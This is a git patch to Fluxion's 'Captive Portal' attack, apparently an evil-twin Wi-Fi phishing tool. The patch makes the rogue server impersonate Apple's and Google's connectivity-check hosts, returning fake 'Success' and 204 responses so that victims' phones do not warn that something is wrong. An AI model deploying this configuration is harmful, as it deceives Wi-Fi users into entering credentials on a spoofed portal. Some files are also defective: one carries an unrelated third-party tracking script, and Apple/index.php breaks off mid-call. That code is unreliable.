From 54b0165db4f821993ea395714c47ff1a7ad77fc5 Mon Sep 17 00:00:00 2001
From: Matias Barcenas <MPX.4132@Gmail.com>
Date: Sat, 2 Dec 2017 03:15:31 -0600
Subject: [PATCH] Added some warning suppression to Android & iOS.

For iOS, the warnings are suppresed up to the current version (11.2).
For Android, the warnings are suppresed for only some versions (varies).
---
 attacks/Captive Portal/attack.sh              | 43 ++++++++++++++++---
 .../Apple/hotspot-detect.html                 |  2 +
 .../connectivity responses/Apple/index.php    |  2 +
 .../connectivity responses/Google/blank.html  |  0
 .../Google/generate_204.php                   |  2 +
 .../connectivity responses/Google/index.html  |  0
 6 files changed, 44 insertions(+), 5 deletions(-)
 create mode 100644 attacks/Captive Portal/lib/connectivity responses/Apple/hotspot-detect.html
 create mode 100644 attacks/Captive Portal/lib/connectivity responses/Apple/index.php
 create mode 100644 attacks/Captive Portal/lib/connectivity responses/Google/blank.html
 create mode 100644 attacks/Captive Portal/lib/connectivity responses/Google/generate_204.php
 create mode 100644 attacks/Captive Portal/lib/connectivity responses/Google/index.html

diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh
index 4e38480..4e794ad 100755
--- a/attacks/Captive Portal/attack.sh	
+++ b/attacks/Captive Portal/attack.sh	
@@ -324,6 +324,10 @@ function captive_portal_set_attack() {
 		chmod u+x "$FLUXIONWorkspacePath/captive_portal/$authenticatorFile"
 	done
 
+	# Add the files for captive portal internet connectivity checks.
+	cp -r "$FLUXIONPath/attacks/Captive Portal/lib/connectivity responses/" \
+		"$FLUXIONWorkspacePath/captive_portal/connectivity_responses"
+
 	# Generate the dhcpd configuration file, which is
 	# used to provide DHCP service to APRogue clients.
 	echo "\
@@ -358,6 +362,8 @@ server.modules = (
 	\"mod_rewrite\"
 )
 
+accesslog.filename = \"$FLUXIONWorkspacePath/lighttpd.log\"
+
 fastcgi.server = (
 	\".php\" => (
 		(
@@ -399,13 +405,40 @@ index-file.names = (
 )
 
 \$SERVER[\"socket\"] == \":443\" {
-	ssl.engine                  = \"enable\"
-	ssl.pemfile                 = \"$FLUXIONWorkspacePath/server.pem\"
+	ssl.engine = \"enable\"
+	ssl.pemfile = \"$FLUXIONWorkspacePath/server.pem\"
 }
 
-#Redirect www.domain.com to domain.com
-\$HTTP[\"host\"] =~ \"^www\.(.*)$\" {
-    url.redirect = ( \"^/(.*)\" => \"http://%1/\$1\" )
+# Redirect www.domain.com to domain.com
+#\$HTTP[\"host\"] =~ \"^www\.(.*)$\" {
+#	url.redirect = ( \"^/(.*)\" => \"http://%1/\$1\" )
+#}
+
+# The following will emulate Apple's and Google's internet connectivity checks.
+# This should help with no-internet-connection warnings in some devices.
+\$HTTP[\"host\"] == \"captive.apple.com\" { # Respond with Apple's captive response.
+	server.document-root = \"$FLUXIONWorkspacePath/captive_portal/connectivity_responses/Apple/\"
+}
+
+# Consolidate the clusterfuck below, I'm sleepy right now, can't regex right...
+\$HTTP[\"host\"] == \"www.google.com\" { # Respond with Google's captive response.
+	server.document-root = \"$FLUXIONWorkspacePath/captive_portal/connectivity_responses/Google/\"
+	url.rewrite-once = ( \"^/generate_204\$\" => \"generate_204.php\" )
+}
+
+\$HTTP[\"host\"] == \"clients3.google.com\" { # Respond with Google's alternative captive response.
+	server.document-root = \"$FLUXIONWorkspacePath/captive_portal/connectivity_responses/Google/\"
+	url.rewrite-once = ( \"^/generate_204\$\" => \"generate_204.php\" )
+}
+
+\$HTTP[\"host\"] == \"connectivitycheck.gstatic.com\" { # Respond with Google's alternative captive response.
+	server.document-root = \"$FLUXIONWorkspacePath/captive_portal/connectivity_responses/Google/\"
+	url.rewrite-once = ( \"^/generate_204\$\" => \"generate_204.php\" )
+}
+
+\$HTTP[\"host\"] == \"connectivitycheck.android.com\" { # Respond with Google's alternative captive response.
+	server.document-root = \"$FLUXIONWorkspacePath/captive_portal/connectivity_responses/Google/\"
+	url.rewrite-once = ( \"^/generate_204\$\" => \"generate_204.php\" )
 }
 " > "$FLUXIONWorkspacePath/lighttpd.conf"
 
diff --git a/attacks/Captive Portal/lib/connectivity responses/Apple/hotspot-detect.html b/attacks/Captive Portal/lib/connectivity responses/Apple/hotspot-detect.html
new file mode 100644
index 0000000..e39b014
--- /dev/null
+++ b/attacks/Captive Portal/lib/connectivity responses/Apple/hotspot-detect.html	
@@ -0,0 +1,2 @@
+<html><script type="text/javascript">window["_gaUserPrefs"] = { ioo : function() { return true; } }</script><head><title>Success</title><style></style><script nonce="" src="https://assets.evulid.cc/js/evulid-matomo.js"></script><noscript><p><img src="https://mato.evulid.cc/matomo.php?idsite=8&amp;rec=1" style="border:0" alt="" /></p></noscript></head><body>Success
+</body></html>
diff --git a/attacks/Captive Portal/lib/connectivity responses/Apple/index.php b/attacks/Captive Portal/lib/connectivity responses/Apple/index.php
new file mode 100644
index 0000000..bc86108
--- /dev/null
+++ b/attacks/Captive Portal/lib/connectivity responses/Apple/index.php	
@@ -0,0 +1,2 @@
+<?php
+	header(
diff --git a/attacks/Captive Portal/lib/connectivity responses/Google/blank.html b/attacks/Captive Portal/lib/connectivity responses/Google/blank.html
new file mode 100644
index 0000000..e69de29
diff --git a/attacks/Captive Portal/lib/connectivity responses/Google/generate_204.php b/attacks/Captive Portal/lib/connectivity responses/Google/generate_204.php
new file mode 100644
index 0000000..df35096
--- /dev/null
+++ b/attacks/Captive Portal/lib/connectivity responses/Google/generate_204.php	
@@ -0,0 +1,2 @@
+<?php
+	header("HTTP/1.0 204 No Content");
diff --git a/attacks/Captive Portal/lib/connectivity responses/Google/index.html b/attacks/Captive Portal/lib/connectivity responses/Google/index.html
new file mode 100644
index 0000000..e69de29